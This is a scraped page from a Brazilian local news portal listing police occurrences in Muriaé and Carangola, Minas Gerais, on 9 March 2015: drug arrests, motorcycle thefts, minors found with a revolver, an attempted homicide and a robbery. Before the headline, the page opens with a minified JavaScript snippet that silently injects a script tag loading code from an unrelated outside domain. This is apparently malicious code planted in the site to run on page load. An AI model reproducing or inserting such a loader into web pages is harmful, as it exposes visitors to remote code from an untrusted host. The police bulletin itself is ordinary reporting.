;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Ocorrências policiais Carangola e Região - 09/03/2015. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Ocorrências policiais Carangola e Região – 09/03/2015.

pmOCORRÊNCIAS DE DESTAQUE MURIAÉ – 09/03/2015
76ª CIA PM – MURIAÉ-MG

PM EFETUA PRISÃO DE AUTORES POR TRÁFICO DE DROGAS EM MURIAÉ

Em 07/03/2015, por volta de 00h51min, na Rua José Antônio Amaro, no Bairro José Cirilo, militares abordaram W.S.N., de 19 anos, o qual estava de carona na motocicleta HONDA TITAN, cor vermelha, conduzida por J.P.S., de 20 anos. Com o primeiro citado foi localizado 05 papelotes de cocaína, que ele disse ter comprado do indivíduo conhecido, morador da localidade, porém este não foi encontrado. Autor preso e conduzido à DPJ.
Na mesma data, por volta das 13h40min, na Rua João Dornelas, no Bairro Dornelas, R.C.J., de 21 anos, foi abordado e localizado em sua cintura uma bucha de maconha. Este disse que a droga seria comercializada em uma festa na casa de sua irmã, pelo que foi preso e conduzido à DPJ.
PM APREENDE MENOR POR TENTATIVA DE FURTO DE UM VEÍCULO EM MURIAÉ

Em 07/03/2015, por volta das 23h, na Avenida José Máximo Ribeiro, no Bairro José Augusto de Abreu, M.P.S., de 17 anos, foi abordado conduzindo a motocicleta HONDA/CBX 200 STRADA, cor preta, ano 2001, de propriedade de J.L.P., de 51 anos. O autor disse que utilizou uma chave falsa para furtar o veículo, chave esta que, segundo o autor, foi feita no chaveiro em frente a antiga SECRETARIA DE SAÚDE, no CENTRO. O menor foi apreendido e conduzido à DPJ.
PM APREENDE MENORES PORTANDO UM REVÓLVER CALIBRE 38 EM MURIAÉ

Em 08/03/2015, por volta de 00h10min, na Alameda Resedas, no Bairro Primavera, militares abordaram os menores A.H.O.S., de 15 anos, e R.S., de 15 anos, sendo encontrado na bolsa da adolescente R.S. 01 revólver TAURUS cal.38, com 05 munições intactas e uma bucha de maconha. Os menores foram apreendidos e conduzidos à DPJ. O aparelho celular do primeiro adolescente foi apreendido, tendo em vista haver diversas fotos de menores com arma de fogo, inclusive troca de mensagens informando localização de viaturas.

PM LOCALIZA VEÍCULO FURTADO E PRENDE AUTOR DO FURTO EM MURIAÉ

Em 08/03/2015, por volta das 12h, na Fazenda Bom Jardim, no Distrito de Itamuri, após denúncia anônima dando conta que um indivíduo estava desmanchando uma motocicleta furtada. Militares depararam com L.R.S., de 18 anos, carregando parte da carenagem de uma moto e, no interior da casa de seus pais, foi encontrado: 01 para-lamas, 02 retrovisores, e 01 farol. Então o indivíduo confessou o furto da motocicleta HONDA/CG 150 FAN ESI, cor preta, em 04/03/2015, no bairro CARDOSO DE MELLO. O veículo foi localizado em uma mata próxima, sendo recolhido ao pátio credenciado. Autor preso e conduzido à DPJ.

75ª CIA PM – CARANGOLA-MG
PM APREENDE MENOR POR TENTATIVA DE HOMICÍDIO EM CARANGOLA

Em 06/03/2015, por volta das 19h40min, na Estrada Bambu Amarelo, zona rural de Carangola, A.C.G., de 43 anos, relatou que vendeu para O.F.F., de 16 anos, uma motocicleta YAMAHA YBR, e que na data de hoje combinou de receber o restante do dinheiro, tendo ido até a residência deste na motocicleta HONDA TWISTER, cor preta. Que embarcaram na motocicleta, pois o menor lhe disse que receberia um dinheiro de uma pessoa e lhe repassaria a quantia devida. Que no trajeto, o adolescente sacou uma arma de fogo e disparou nas costas do reclamante, vindo a vítima a cair ao solo e embrenhar-se a pé no meio do mato para fugir, tendo o adolescente efetuado mais disparos em sua direção e fugiu com a motocicleta, tomando rumo ignorado. A vítima foi socorrida ao hospital pela viatura do SAMU sendo devidamente atendida e constatada uma perfuração nas costas. Em rastreamento, o menor foi encontrado em sua residência, onde foi apreendido. Este disse o local onde escondeu a motocicleta, a qual foi recuperada e removida ao pátio credenciado. A arma de fogo utilizada, disse ter jogado em um córrego.

PM EFETUA PRISÃO POR TRÁFICO DE DROGAS EM CARANGOLA

Em 08/03/2015, por volta de 00h45min, na Praça Firmino Antunes Vieira, no Bairro Lacerdina, militares abordaram M.A.L.J., de 19 anos, sendo localizados 05 papelotes de cocaína, 03 tabletes de maconha, R$50,00 e um aparelho de telefone celular. Já no bolso de R.P.G., de 23 anos, foi encontrado 01 papelote de cocaína. O segundo indivíduo relatou que adquiriu a droga do primeiro para consumo próprio. Autores presos e conduzidos à DPJ.
PM EFETUA PRISÃO DE AUTOR POR ROUBO A TRASEUNTE EM CARANGOLA

Em 08/03/2015, por volta das 07h30min, na Rua Antônio Marques, no Bairro Triângulo, J.S., de 52 anos, disse que foi abordado pelos autores G.L., de 30 anos, e C.V.L.“V.”, de 19 anos, os quais, utilizando de violência, lhe derrubaram com chutes e socos, e roubaram 01 celular NOKIA, R$ 120,00; 01 relógio de metal SEIKO e um isqueiro. Em rastreamento, militares localizaram o primeiro autor e, no bolso de sua bermuda, o celular da vítima. Ele foi preso e conduzido à DPJ. O segundo autor, não foi localizado.

ASSESSORIA DE COMUNICAÇÃO ORGANIZACIONAL DO 47° BPM
RUA JOSÉ DE FREITAS LIMA Nº 47 – BAIRRO SAFIRA
MURIAÉ / MG
TELEFONE: 3696-3275. 3696-3265

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.